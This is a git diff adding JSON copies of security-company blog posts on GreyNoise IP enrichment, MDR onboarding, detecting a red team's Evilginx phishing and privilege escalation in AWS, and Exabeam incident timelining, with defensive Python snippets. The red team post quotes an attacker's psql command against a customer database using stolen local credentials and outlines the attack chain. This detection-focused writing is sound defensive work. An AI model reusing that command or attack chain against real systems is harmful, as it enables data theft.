few \u2014 because these are the products our customers already use, and we ingest activity events and alerts to monitor a customer\u2019s environment. (By the way, if you want to see a longer list of our integration partners, go check out this page .) But we also use other technologies behind the scenes to make our analysts more efficient. Ultimately, we\u2019re trying to apply technology to the alerts we pull from our integration partners so we can: 1) generate higher fidelity alerts and 2) give our analysts additional context when they\u2019re triaging an alert. When we evaluate technologies that we\u2019ll potentially integrate into Expel Workbench, we typically ask ourselves four questions: Does this product or service allow us to improve a customer\u2019s security posture? Does this technology offer new detection capabilities, improved response capabilities or provide our customers greater visibility into the work we\u2019re doing? Will this product/service provide additional context that our SOC analysts would find useful? Will it allow us to shrink the time to evaluate a class of alerts? 
If a technology meets any of the criteria above, then we\u2019ll take it for a test drive to see if it can provide value to Expel Workbench, our analysts and our customers. What\u2019s GreyNoise? GreyNoise has sensors all around the world that tell you what IPs are scanning the internet on a daily basis. When GreyNoise sensors detect scanning activity from an IP address, the service records the behaviors it observes from the IP along with related context about what it knows about that source. Why is this useful? This context gives you a global view of what an IP address has been up to historically (a perspective that\u2019s hard to come by otherwise). For example, threat researchers can use this data to look for spikes in scanning to identify possible new outbreaks of worms or other potential threats. Security practitioners can also use this data to filter out the noise in their network logs so they can focus their time on investigating legitimate threats actors and avoid wasting time chasing noise. Before we evaluated GreyNoise, we thought their data could help us in a couple of ways. First, we thought GreyNoise\u2019s data might help us enrich the alerts and investigative leads we generate with additional context so our SOC analysts could shrink the time it takes to triage alerts. Second, we were interested in experimenting with how we could use GreyNoise data to detect threats. Although detection isn\u2019t our primary use case for GreyNoise, we wanted to explore some ideas that could help us identify noteworthy activity at our customers. How we evaluated GreyNoise (and what we learned) In order to evaluate GreyNoise and determine whether the tool would deliver the value we thought it might, we decided to run several different experiments using the service. Greynoise offers an API free of charge to so you can test various use cases and get a better understanding of how the technology can help your security operations. This is pretty awesome \u2014 how many other vendors are offering things for free to prove their value? We used this API, to test four use cases. For each use case below, we\u2019ll describe why we explored it, how we evaluated it and what we learned. As you\u2019re reading, think about how you might create different detection cases and then how you\u2019d evaluate them for your organization. Use case #1: Improving investigative context and triage time Why we tested this use case: As a managed security provider, we\u2019re always exploring ways to make our analysts more efficient. One common pain point for security analysts everywhere is that Internet-wide scanning generates a lot of noise. Most don\u2019t require any actions. But reviewing them sucks up hours of time. We wanted to explore whether GreyNoise could help us quickly identify and filter out the noise so our analysts can focus their valuable time and energy on the alerts that matter. How we evaluated it: We took a sample of ~11,000 public IPs observed generating alerts across our customer base and requested GreyNoise context. This helped us determine how often the service would be able to tell us something valuable about an IP address. What we found: Our tests showed that GreyNoise was able to provide valuable context for 21 percent of the IP addresses we tested. This was a promising result for us! Speeding up the investigative process for a fifth of all alerts we review is a significant step in the right direction. As the GreyNoise service grows and collects more data we expect this percentage to increase. 
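To reproduce a smaller version of this experiment, the sketch below shows the general shape of the enrichment step: take an alert's source IP and ask GreyNoise for context. The endpoint path, header name, and response fields here are assumptions; check GreyNoise's current API documentation for the exact interface.

```python
import requests

# Path assumed for illustration; verify against GreyNoise's current docs.
GREYNOISE_URL = "https://api.greynoise.io/v2/noise/context/{ip}"

def enrich(ip: str, api_key: str) -> dict:
    """Ask GreyNoise what it knows about an alert's source IP."""
    resp = requests.get(
        GREYNOISE_URL.format(ip=ip),
        headers={"key": api_key},  # header name assumed
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()

def triage_hint(context: dict) -> str:
    # "seen" and "classification" are the kinds of fields the context API
    # returns; treat these names as assumptions and adjust to the real schema.
    if not context.get("seen"):
        return "not a known scanner -- investigate normally"
    if context.get("classification") == "benign":
        return "known benign scanner -- likely noise"
    return "known internet scanner -- probably untargeted, but verify"

if __name__ == "__main__":
    ctx = enrich("198.51.100.7", api_key="REPLACE_ME")
    print(triage_hint(ctx))
```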
Use case #2: Detect when a customer IP address is flagged by GreyNoise Why we tested this detection: If GreyNoise identifies a customer\u2019s IP as noise, it could be a security concern. For example, a noisy customer IP might mean there\u2019s a worm infection on a customer asset, a compromised IoT device or a vulnerability on a customer asset (think reflective DoS). How we evaluated it: We collected known IP space for a few of our customers by looking up their ASNs. We downloaded the daily noise from GreyNoise and compared the results against this IP space (~74,000 IPs). What we found: We found 14 customer IP addresses that were classified as noisy by GreyNoise. When we investigated, we found evidence of anomalous outbound SMB traffic that led to a customer notification. Use case #3: Detect customer hosts communicating with suspicious IP addresses Why we tested this detection: If a customer asset is communicating with an IP flagged by GreyNoise, it could represent an actionable security concern or else give us valuable context that will speed up our investigation. How we evaluated it: We took a sample of 29,652 destination IPs observed in customer environments and ran them against the GreyNoise API to retrieve context. What we found: We found that a significant portion of security alerts observed across our customer base (~ 25 percent) were going to a \u2018noisy\u2019 IP address. When we reviewed these alerts, it was clear that the context GreyNoise provided would have accelerated our investigative process by, for example, differentiating targeted attacks from generic internet-wide scanning. Detection #4: Detect successful logins or data access sourced from internet scanners Why we tested this detection: If we saw successful logins from an IP address scanning the internet, it could indicate a user\u2019s credentials were compromised or that some services were misconfigured. For example, we\u2019ve seen organizations sometimes misconfigure cloud storage services like AWS S3 buckets or Microsoft Azure blobs. If we saw successful access to this storage from a scanner, it could indicate a misconfiguration that puts the customer\u2019s data at risk. How we evaluated it: We took a sample of 6,310 alert source IPs observed in customer environments and ran them against the GreyNoise API to retrieve context. What we found: We didn\u2019t find many instances of successful logins or data access from noisy IPs (good news!). GreyNoise provided context for ~0.5 percent of the alerts we tested. This is also encouraging from a detection perspective. Following our testing, we\u2019ve implemented rules to generate alerts when we observe a successful login or data access from a noisy IP address to highlight potentially compromised accounts or a misconfigured cloud storage service. Why we like GreyNoise When we see alerts sourced from IPs that GreyNoise classifies as \u201cnoise,\u201d it helps us accurately prioritize them as non-targeted threats. Of course, this depends on the type of activity we observe and how the IPs are tagged. GreyNoise has helped us to create new rules that eliminate noise for specific low-value events that don\u2019t represent an actionable security concern. Additionally, the context it gives our analysts during alert triage can significantly reduce analysis time. Since integrating GreyNoise in Expel Workbench last summer, Expel has used the data to more efficiently triage alerts, detect interesting activity and weed out internet noise to focus on the alerts that really matter. 
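As a rough illustration of the use case #2 cross-check, here is how you might compare your own address space against a list of noisy IPs. The CIDR ranges and addresses are placeholders; in practice the noisy list would come from GreyNoise's daily data and your ranges from your ASN or IPAM.

```python
import ipaddress

# Placeholder data for illustration only.
our_networks = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "198.51.100.0/25")]
noisy_ips = ["203.0.113.45", "192.0.2.10", "198.51.100.77"]

def ours(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in our_networks)

# Any hit here is worth a look: a host you own that is scanning the internet
# could be a worm infection, a compromised IoT device, or a misconfiguration.
flagged = [ip for ip in noisy_ips if ours(ip)]
print(flagged)  # -> ['203.0.113.45', '198.51.100.77']
```

A match is a lead, not a verdict; the anomalous outbound SMB traffic described above is the kind of follow-up investigation these hits should trigger.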
Moving forward, we hope to continue research into creative new use cases and leverage some new GreyNoise features (hello GreyNoise query language!) for detection and research. Big shout out to two of our interns, Chris Vantine and Brandon Dossantos for their work in helping us evaluate GreyNoise. Your executable Interested in taking GreyNoise for a test drive? There are two easy ways to get started. First, head over to the GreyNoise Visualizer and try searching for a few IP addresses as you investigate alerts throughout the day. You might find (as our analysts did) that this context reduces the time it takes to review alerts. Second, if you are looking to integrate GreyNoise context into your analysis workflow, take a look at the GreyNoise API . This is a great way to automate lookups and eliminate extra steps in your analysis process. Give these ideas a try and see how GreyNoise stacks up. We\u2019d love to hear about what you learned during your evaluation process. Drop us a note and share your thoughts." +} \ No newline at end of file diff --git a/evaluating-mdr-providers-ask-these-questions-about.json b/evaluating-mdr-providers-ask-these-questions-about.json new file mode 100644 index 0000000000000000000000000000000000000000..15aaf26e783dea26fe6067b5aede1206586a422b --- /dev/null +++ b/evaluating-mdr-providers-ask-these-questions-about.json @@ -0,0 +1,6 @@ +{ + "title": "Evaluating MDR providers? Ask these questions about ...", + "url": "https://expel.com/blog/evaluating-mdr-providers/", + "date": "Feb 24, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Evaluating MDR providers? Ask these questions about their onboarding process Security operations \u00b7 5 MIN READ \u00b7 LAURENCE WARRINER \u00b7 FEB 24, 2022 \u00b7 TAGS: Cloud security / MDR / Tech tools Historically, managed detection and response (MDR) service providers have one major flaw that\u2019s overlooked \u2013 the level of effort required to turn on the service. In an industry where every minute counts, we don\u2019t have time to waste. Yet the onboarding process is so complicated you need project managers on both sides to manage the implementation. You have to navigate through pages and pages of complicated instructions to connect everything together. And it probably requires additional hardware, VMs with gigantic specs or another agent to deploy. The daily and weekly project status calls can last six months or longer. It\u2019s time consuming, expensive, and the level of effort is always underestimated. Sound familiar? When selecting any service provider, the initial setup, integration and activation should be an important factor in the decision-making process. Often, integrations take time and resources which lead to hidden expenses. We refuse to be that provider. Our development team vowed to make getting started with Expel as easy as joining a wireless network. The Expel Workbench\u2122 makes onboarding simple by connecting tech using APIs (not agents). Our platform has an easy-to-follow interface and provides step-by-step guides for each technology. And we\u2019re continuously improving the process to save you more time \u2013 even if it\u2019s going from 30 down to five minutes. We\u2019ve learned that you really can have an easy button that gets services up and running in a matter of minutes with very little effort. So close that project plan and re-assign the project manager. Want to say goodbye to frustrating project plans and get a return on your investment immediately? You can. 
Just make sure that as you\u2019re evaluating MDR providers, you ask the right questions. And also make sure you get the right answers. We often talk about how we\u2019re transparent here at Expel. This blog post is an example of that. In this post, we\u2019ll share our responses to the top questions you should ask MDR providers to help you better understand how they\u2019ll integrate with your tech and start monitoring. Can I onboard myself? Yes, please! Using the Expel Workbench, you can add, remove and edit devices whenever you wish. Although we have dedicated onboarding engineers ready to help with any support or questions, we purposely designed the Expel Workbench for easy self-onboarding. When can I start the onboarding process? Imagine you have a new TV provider. You\u2019ve agreed to start your contract with them on June 1. On June 1, they call you and ask, \u201cSo, what channels do you want? Where should we ship the box?\u201d That would be annoying, right? You want to watch TV on the day you start paying, not wait until then to start the process of getting it up and running. We strongly believe in doing everything possible to provide service from day one. That\u2019s why we give our customers all the information and access that they need well in advance. At Expel, our MDR customers receive: Step-by-step guides for each of your technologies. You can get all the details on the things you need to do on your side. Whether it\u2019s user account creation, firewall changes or amending access right, you\u2019ll find everything at support.expel.io \u2014 at any time. Expel Workbench access. We create your access accounts for the Expel Workbench so that you can start getting familiar with the interface and adding your team accounts, PagerDuty configurations, and any service desk integrations. Integration. As soon as you have Workbench access, you can start integrating your technologies. Not only does this allow you to do lean ahead work, but also allows our SOC team to start evaluating the signal, learning your environment and tuning alerts so that when we hit the switch on day one, you only get the alerts you really care about. Slack channel and support portal access. Talk to your Expel team whenever you need help. Initially, you might have questions about onboarding or navigating Workbench. Just send us a message in our portal or in Slack, and we\u2019ll be right there to help. What does the onboarding interface look like? Adding a cloud service into your Expel Workbench, like AWS CloudTrail, is simple with our automated wizard. Check out this short video to see how it works. And that\u2019s it! You\u2019re now fully onboarded and we\u2019re monitoring your environment. Can I add, edit or update integrations myself? All tech integrations are entirely in your control. You can easily add, remove and edit whenever you wish. This is not only beneficial for onboarding new techs, but we may also notify you automatically if credentials are not working or access permissions have been changed. These things can also be corrected right inside Workbench. Do you have documentation to help me do that? All of our onboarding support documentation is publicly available. We have a dedicated guide for each technology that details ( step-by-step ) the best way to configure your tech and how to add this information into your Workbench account. 
Having our integration guides publicly available allows Expel customers to understand any integration requirements ahead of time, so you can start planning and creating any user/API credentials in accordance with your internal change control requirements. What if I need help? We have a dedicated onboarding support team on hand to help you if you run into issues. We can help with both technical onboarding issues and can also verify the integrity of the data your tech is sending us. We also have automated health checks to ensure your device is sending us all of the glorious data our analysts love to ingest. When onboarding a new service of any kind, the process to get up and running is often an afterthought. When this happens, it causes stress and frustration for you and your team and typically starts the relationship with the vendor off on the wrong foot. It\u2019s important that you and your teams completely understand the onboarding requirements, both from a cost perspective (are there hidden costs because you need prerequisite equipment or services?) and a resource perspective. Your Expel engagement manager will make sure you understand the level of effort that\u2019s required from your teams behind the scenes. For example, how much time is needed to complete the connectivity requirements? And if the environment changes or permissions changes are needed, what are your internal change control requirements and how can your provider help to plan for these? As one of your critical partners in keeping your org safe, your MDR provider should help you understand how to best work with them and set you up for success before day one. What happens after onboarding? The Expel Workbench is designed and developed in-house with a big focus on user experience from conception. We work hard so that service activation is as simple and easy as possible. Remember: onboarding can and should be a painless process. As I mentioned, we provide simple step-by-step online guides for you to follow to configure your tech. And the output of these can easily be copied and pasted into secure fields within your Expel Workbench account. And we don\u2019t stop there. We\u2019re continually improving our integration technologies to include automated wizards between Expel Workbench and your cloud tech, making our integrations amazingly quick, easy, and seamless! Once onboarding is complete, we love getting feedback on how we can improve the experience. We invite our users to complete a quick, two-question survey after they finish onboarding. So, how\u2019s it going so far? Here\u2019s what some of our customers are saying: Want to learn more about how Expel does onboarding? Let\u2019s chat! (yes \u2013 we\u2019ll connect you with a real human. 
Although our bots are great conversationalists.)" +} \ No newline at end of file diff --git a/evilginx-ing-into-the-cloud-how-we-detected-a-red-team.json b/evilginx-ing-into-the-cloud-how-we-detected-a-red-team.json new file mode 100644 index 0000000000000000000000000000000000000000..76e967f2066bc8405368829e3dabf3d8b1bfe14b --- /dev/null +++ b/evilginx-ing-into-the-cloud-how-we-detected-a-red-team.json @@ -0,0 +1,6 @@ +{ + "title": "Evilginx-ing into the cloud: How we detected a red team ...", + "url": "https://expel.com/blog/evilginx-into-cloud-detected-red-team-attack-in-aws/", + "date": "Dec 1, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Evilginx-ing into the cloud: How we detected a red team attack in AWS Security operations \u00b7 6 MIN READ \u00b7 ANTHONY RANDAZZO AND BRUCE POTTER \u00b7 DEC 1, 2020 \u00b7 TAGS: Cloud security / MDR It\u2019s no secret that we\u2019re fans of red team exercises here at Expel. What we love even more, though, is when we get to detect a red team attack in AWS Cloud. Get ready to nerd out with us as we walk you through a really interesting red team exercise we recently spotted in a customer\u2019s AWS cloud environment. What is a red team engagement? First things first: Red team assessments are a great way to understand your detection and investigative capabilities, and stress test your Incident Response (IR) plan . There are also penetration tests. These are a bit different . Here\u2019s the best way to think about them, and understand the differences between the two: Penetration test: \u201cI need a pen test. This is the scope (boundaries). Tell me about all of the security holes within the scope of this assessment. In the meantime, I\u2019ll be watching our detections.\u201d Red team: \u201cThis is your target. Try to get into my environment with no help and achieve that target, while also evading my defensive measures.\u201d At Expel, we find ourselves on the receiving end of a lot of penetration tests and red team engagements \u2013 in fact, we\u2019ve even got our own playbook to help our customers plan them. (Yes, we regularly encourage our customers to put our Security Operations Center to the test.) For the duration of this blog post, we\u2019ll focus on what we\u2019ve defined as a red team engagement. Can you \u201cred team\u201d in AWS? Before the cloud was a thing, red teams had a lot of similarities: The crafty \u201cattackers\u201d phished a user with a malicious document with a backdoor, grabbed some Microsoft credentials and pressed a big flashing \u201ckeys to the kingdom\u201d button to achieve their objective. (Okay, there wasn\u2019t really a big flashing button, but sometimes it felt that way.) Fast forward to today: That model I just described is much different to execute in AWS. Most access is managed and provisioned through a third party identity and access manager (IdM/IAM) like Okta or OneLogin. An attacker would have to identify some exposed AWS access keys elsewhere or compromise a multi-factor authenticated (MFA) user in an IdM such as Okta. That\u2019s exactly what one of our customers did recently when they brought in a red team to intrude into the customer\u2019s AWS environment, causing our analysts to spring into action. Let\u2019s dive into what we uncovered during this red team exercise, what our team learned from it and how you can protect your own org from similar attacks. 
How we discovered a crafty phishing attempt in AWS cloud The first hint that something was wrong came in the form of one of our analysts discovering a login from an anonymous source to a customer\u2019s AWS console. We immediately sprang into action, digging in to see if that user had logged in from known proxies or endpoints previously. Expel Workbench lead alert But wait a second. Isn\u2019t this customer\u2019s AWS access provisioned through Okta? Why didn\u2019t we get any Okta alerts? Shortly thereafter, an Amazon GuardDuty alert fired \u2013 those same access keys were being used from a Python software development kit (SDK) rather than the AWS console and someone was enumerating those access key permissions. The TL;DR on all of that? Not good. We immediately escalated this as an incident to the customer to understand whether this series of events was expected. Observing the end goal of the red team That\u2019s when we learned that we were just beginning a red team exercise, so we let the red team\u2019s attack play out to see what else we\u2019d uncover. That\u2019s when things got interesting. First, we needed to understand how the red team got access to multiple AWS accounts when they were protected by Okta with MFA. Our theory was that these users were phished but we had to prove it. We dove into the Okta log data to look for anomalies. Anything that indicated something fishy (pun intended). We correlated with the DUO MFA logs and that\u2019s when we spotted some weirdness. It looked like the users\u2019 session tokens may have been intercepted. All of these signs pointed to a crafty open source phishing kit like Evilginx. Now that we knew how the red team got in, what were they after? After a few observed instance credential compromises and privilege escalations through role assumptions, it seemed they found what they were looking for. They made an AWS API call \u2013 StartSession \u2013 to AWS Systems Manager (the AWS equivalent to Windows SCCM). Expel Workbench AWS GuardDuty alert A few minutes later, we had a CrowdStrike Falcon EDR alert for a Python backdoor. They now had sudo Linux access to that EC2 server. Expel Workbench CrowdStrike alert At this point, it was time to make the response jump to the CrowdStrike Falcon event data to see what they were up to. After perusing the file system, they found local credentials to an AWS Redshift database. This was it. The crown jewels for that business: all of their customer data. /usr/bin/perl -w /usr/bin/psql -h crownjewels.customer.com -U username -c d If this had been a real attack, we would\u2019ve immediately remediated the identified compromised Okta and AWS accounts in question. But when it comes to red team exercises, we think they\u2019re not only a great way to pressure test our SOC, but they also give us an opportunity to learn about potential ways to help a customer improve their security. Where did we get our signal to detect this attack in AWS Cloud? After a red team exercise is complete, we always go back and ask ourselves the following question: What helped us get visibility that we can alert against in the future? In this case, the security signals that helped us detect and respond to the bad behavior in AWS Cloud were: Okta System logs: These logs contain all of the Okta IdM events, including the SSO activity to third party applications like AWS. DUO logs: MFA logs allowed us to spot that something was off as we correlated these with the Okta logs.
Amazon CloudTrail: This helped us track ConsoleLogins and control plane activity, which is how we got our initial lead and tracked API activity from compromised AWS access keys. Amazon GuardDuty: GuardDuty was an essential tool that helped us look for and identify bad behavior in AWS. CrowdStrike: CrowdStrike helped us identify which specific cloud instances were compromised, and also helped us spot persistence. Endpoint visibility in cloud compute is often overlooked. If we notice gaps in security signal during a red team exercise, we have a conversation with the customer to see how we can potentially help them implement more or different signals so that our team has full visibility into their environment. How to protect your own org from these types of attacks With a sophisticated red team exercise, you should have some lessons that come out of it \u2013 both for your team of analysts and for your customer. Here are our takeaways from this exercise that you can use in your own org: Protect both API access as well as your local compute resources in the cloud. Use AWS controls like Service Control Policies to restrict API access across an AWS organization \u2013 this will help you manage who can do what in your environment and where they\u2019re allowed to come from. The cloud is a double-edged sword: APIs are great because they let cloud users experiment and scale easily (they\u2019re everything everybody loves about the cloud). But API access also means that attackers can more easily do a lot of bad things at once if they make their way into your environment.Protect that access and your local compute resources by restricting access and using the tools available to you. MFA isn\u2019t your silver bullet anymore. Spoiler alert: We\u2019ve said before that MFA won\u2019t protect you from attackers. While it\u2019s still important to have, it\u2019s not enough on its own. This particular attack underscores just how easy it is for an attacker to download a pretty sophisticated, automated attack from GitHub and then unleash it on your org in an effort to bypass MFA. As automated phishing packages like this become more common, every org will need to find more ways to protect themselves from \u201cman in the middle\u201d-type attacks. Okta\u2019s adaptive multi-factor authentication is a great preventative control to layer on that can help. The industry needs better signal to detect compromised cloud users, particularly those as a result of MitM attacks\u2026 and detect it earlier in the attack sequence. There\u2019s plenty of data in the existing log data to use for behavioral detections. Microsoft does a pretty reasonable job at trying to spot these with their Azure Identity Protection service . Want to know when we share more stories about stopping evil from lurking in AWS and thwarting sophisticated phishing attacks? Subscribe to our EXE blog to get new posts sent directly to your email." 
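If you want to experiment with the CloudTrail piece of that signal yourself, here's a minimal sketch of the kind of check behind our first lead: AWS console logins that didn't arrive through the expected federated (Okta) path. It assumes a SAML-federated environment where legitimate console logins show up as assumed roles; the expected identity types and the print-style output are illustrative assumptions, and in real life you'd also want allow-lists for break-glass accounts.

import json
import boto3

cloudtrail = boto3.client("cloudtrail")

# In an environment where all human access is provisioned through an IdP,
# console logins that don't arrive via the federated path deserve a second
# look. Which userIdentity type you expect ("AssumedRole" for most SAML
# setups) depends on how your SSO is wired up -- adjust for your environment.
EXPECTED_IDENTITY_TYPES = {"AssumedRole"}

pages = cloudtrail.get_paginator("lookup_events").paginate(
    LookupAttributes=[{"AttributeKey": "EventName", "AttributeValue": "ConsoleLogin"}]
)
for page in pages:
    for event in page["Events"]:
        detail = json.loads(event["CloudTrailEvent"])
        identity = detail.get("userIdentity", {})
        if identity.get("type") not in EXPECTED_IDENTITY_TYPES:
            print(f"Unexpected console login: {identity.get('type')} "
                  f"{identity.get('arn', 'unknown')} at {detail.get('eventTime')}")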
+} \ No newline at end of file diff --git a/exabeam-an-incident-investigator-s-cheat-code.json b/exabeam-an-incident-investigator-s-cheat-code.json new file mode 100644 index 0000000000000000000000000000000000000000..0984ef0ac65f40c530f08855ac3b7aed9c1418a3 --- /dev/null +++ b/exabeam-an-incident-investigator-s-cheat-code.json @@ -0,0 +1,6 @@ +{ + "title": "Exabeam: an incident investigator's cheat code", + "url": "https://expel.com/blog/exabeam-incident-investigators-cheat-code/", + "date": "Feb 4, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Exabeam: an incident investigator\u2019s cheat code Security operations \u00b7 6 MIN READ \u00b7 ANTHONY RANDAZZO \u00b7 FEB 4, 2020 \u00b7 TAGS: How to / Planning / SOC / Tools If you were to ask any SOC analyst their preferred tool of the trade, just about all of them would tell you how much they love using EDR (Endpoint Detection and Response) tools. I\u2019d say the same. Seventy percent of all compromises still originate at the endpoint , and EDR tools provide the endpoint detection and recording capabilities that security analysts need to tell the story of what happened. But in many cases, telling that story is time consuming because of the abundance of data recorded by the EDR. And EDR telemetry doesn\u2019t account for all the other security signal available to analysts across the network like cloud infrastructure and apps. All that signal is important to help an analyst figure out what\u2019s going on. For example, have you ever timelined Windows event logs using Excel? Yeah, me too. It\u2019s painful. EDR tools are great at finding evil but they aren\u2019t necessarily your go-to source if you have to track a bad guy using a stolen credential across a 100K-node environment. Now, EDRs aren\u2019t perfect. They won\u2019t detect everything. This is why that defense-in-depth strategy is so critical. So how can we get some insight into all security signals in a single, intelligible view? Well, many of our customers use Exabeam for exactly this purpose. What\u2019s Exabeam? Exabeam Advanced Analytics detects threats by identifying high risk, anomalous user and entity activity. This happens by using machine learning to baseline normal activity for all users and entities in an environment. Once a baseline is available, the system automatically detects deviations compared to that baseline, the baseline of a peer group, and that of the organization as a whole\u2014and assigns that activity a risk score. Each time a rule fires, the system accumulates a risk score for that user or entity session (roughly one day of activity). Once the risk score reaches a threshold, you\u2019ll get a Notable User alert. From the alert, you can investigate the user\u2019s session which contains all of the recorded events and triggered rules. Anomaly detection is often synonymous with snake oil in the security marketplace. Boy, was I wrong in this case. Exabeam stitches together all of our defense-in-depth security signals to provide a comprehensive view of what happened. Here are some examples of how Expel uses this insight to tell us things we didn\u2019t know and possibly wouldn\u2019t have known without a tool like Exabeam. Quick and dirty incident timelining when you need answers fast When we identify a security incident, it\u2019s often a time consuming effort to collect all of the data necessary to put together a comprehensive timeline (Windows Event Logs, EDR events, authentication logs, etc.). 
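For context, the manual version of that effort usually boils down to normalizing every source into a common shape and sorting it by time. Here's a toy sketch of that idea; the directory layout and column names are made-up assumptions, and real exports always need more massaging than this.

import glob
import pandas as pd

# Toy illustration of "manual" timelining: each source has already been
# exported to CSV with at least a timestamp, source, and summary column.
frames = []
for path in glob.glob("exports/*.csv"):
    df = pd.read_csv(path, parse_dates=["timestamp"])
    frames.append(df[["timestamp", "source", "summary"]])

timeline = (
    pd.concat(frames, ignore_index=True)
      .sort_values("timestamp")
      .reset_index(drop=True)
)
timeline.to_csv("incident_timeline.csv", index=False)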
To be honest, we\u2019re going to do it anyway to ensure we don\u2019t miss anything. But we also strive to provide answers to our customers as quickly as possible. For example, Expel recently responded to an incident where an attacker was already on an endpoint. The attacker attempted to escalate privileges with PowerSploit. The customer\u2019s EDR alerted on this activity but not the initial compromise. With this incident, we\u2019d ask the following general investigative questions and expand from here: What did the attacker do on this host? Did the attacker move laterally to any other hosts? Did the attacker have access to any other accounts? How did the attacker get into this environment? Traditional response scoping requires us to collect, parse, and review the EDR events and Windows Event Logs (assuming it\u2019s a Windows compromise), and then pivot to other data sources once new leads are identified. Or we can simply review the user or entity timeline in Exabeam. Thanks to Exabeam, we\u2019re already able to identify that the attacker gained initial access to the environment with compromised credentials through the Citrix Netscaler VPN. Fortunately for us responders, the user had little activity in the session so we easily attributed all of this activity back to the attacker. The authorized user wasn\u2019t on the network at the time to inject authorized user activity into the timeline. Moving down the timeline, we see the attacker accessed the published VDI from which we\u2019d received the original EDR alert. We also have the user\u2019s web activity stitched into the Exabeam session and identified that the attacker moved staging tools on the VDI directly from Github. Lastly, we saw the actual EDR alerts stitched into the session timeline where the PowerSploit script was blocked from executing by the EDR. Without even looking at the EDR data, we answered all of our investigative questions with relative accuracy through Exabeam\u2019s user session timeline. What did the attacker do on this host? He or she downloaded various post-exploitation tools to escalate privileges, which were blocked from executing by the EDR. Did the attacker move laterally to any other hosts? Given that we have the Windows Event logs stitched into the session, we didn\u2019t see any other access into the environment with this user account. Did the attacker have access to any other accounts? This question is a little trickier to answer because we\u2019re only reviewing a single user session in Exabeam, but we can infer that the attacker was limited to this single account since he or she was isolated to a single provisioned VDI. How did the attacker get into this environment? We quickly discovered authenticated access into the Citrix environment via Netscaler VPN. This would\u2019ve taken analysts hours to identify with manual response scoping through raw data. Visibility into things that didn\u2019t set off alarms in your EDR Identifying everything an attacker did in the timeframe of when the incident occurred is challenging enough for analysts and responders. In the previous example, we mentioned some of the nuances and lengthy processes involved in endpoint incident response. There are potentially millions of endpoint events occurring every day. This is a lot of data for humans to comb through to timeline an incident. What if an incident spans several days, weeks or even months? 
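To picture why the session model helps with long timeframes, recall the mechanism described earlier: every triggered rule adds risk to a per-user, per-session score, and only sessions that cross a threshold become Notable Users, but the lower-scoring sessions are still there to review later. Here's a toy sketch of that accumulation idea; the rules, weights and threshold are invented for illustration and are not Exabeam's actual scoring.

from collections import defaultdict

# Invented rule weights and threshold, purely to illustrate accumulating
# risk per user session until it crosses an alerting bar.
RULE_SCORES = {"first_vpn_country": 20, "new_process_for_user": 15, "abnormal_logon_hour": 10}
NOTABLE_THRESHOLD = 40

events = [
    {"user": "jsmith", "session": "2020-01-14", "rule": "first_vpn_country"},
    {"user": "jsmith", "session": "2020-01-14", "rule": "new_process_for_user"},
    {"user": "jsmith", "session": "2020-01-14", "rule": "abnormal_logon_hour"},
    {"user": "adoe", "session": "2020-01-14", "rule": "abnormal_logon_hour"},
]

session_risk = defaultdict(int)
for event in events:
    session_risk[(event["user"], event["session"])] += RULE_SCORES[event["rule"]]

for (user, session), score in session_risk.items():
    if score >= NOTABLE_THRESHOLD:
        print(f"Notable user: {user} (session {session}, risk {score})")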
Here\u2019s an example: Expel responded to an intrusion first detected by an EDR due to an attacker\u2019s deployment of a Cobalt Strike Beacon backdoor. Further analysis of the endpoint revealed the attacker performing reconnaissance of the network and Active Directory (AD) environment with various open source tools. Reviewing this user\u2019s sessions in Exabeam gave us lots of insightful data. All activity identified through host response from EDR data was validated in the Exabeam timeline: the EDR alert was preceded by various recon activities. Like the previous compromise example, this authorized user had limited network activity and the only previous session occurred 20 days earlier. Interestingly enough, that earlier session revealed the attacker to be active in the environment; he or she was performing the same recon activities. However, because the activities performed by the attacker during this previous session didn\u2019t warrant an accumulated risk score, Exabeam didn\u2019t generate an alert. More specifically, the attacker didn\u2019t execute the Beacon PowerShell activity that originally brought this to Expel\u2019s attention, thus no EDR detection occurred for the earlier session. (More on this momentarily.) Exabeam proved to be highly valuable in identifying attacker dwell time in an environment \u2014 something that might not always be apparent with EDR technology. Keep in mind that EDR data retention is sometimes limited for endpoints and varies, ranging from storing up to a month of data to as little as several hours\u2019 worth depending on the technology. Traditional IOC scoping, especially with compromised VPN/AD credentials, may not reveal an attacker. Putting it all together At the end of the day, Exabeam is still a machine learning (ML) technology. Like any ML technology it requires a little TLC, but if you take the time to tune it, you can get some really incredible benefits from it. Here are a few tricks we\u2019ve learned about Exabeam: 1. Send the right data to Exabeam. Windows Event Logs, authentication logs (all of them!), web gateway logs and security events (EDR, AV, NSM, etc.) are a great start. Pro tip: anomaly detection of Windows process execution (Windows Event 4688) by users is awesome! Exabeam provides hundreds of data parsers natively to consume just about any data that\u2019s thrown at it. 2. Modify the rule risk scoring based on your organization\u2019s risk posture. The default risk scoring isn\u2019t a one-size-fits-all approach to measuring risk in an organization. Is insider data theft your org\u2019s biggest concern? Give those rules a risk score increase. The process execution example below is one I\u2019d personally opt to boost. 3. Don\u2019t be too quick to introduce new, high-volume data sets that greatly impact the data models (especially web gateway logs). Exabeam guides customers to allow the system to learn on its own for a period of 45 days before enabling the rule set and leveraging it as a production tool. When you add a bunch of new data to an existing model, all of that new data becomes an anomaly. And you don\u2019t necessarily want that. If you find yourself in this position, pull the risk scoring for those affected rules back down to zero until the data models are able to catch up (or consult with your Exabeam partner for help). And here are some other points to consider if you\u2019re thinking of investing in a tool like Exabeam: 1. EDR isn\u2019t going to catch everything, particularly the anomalous use of credentials.
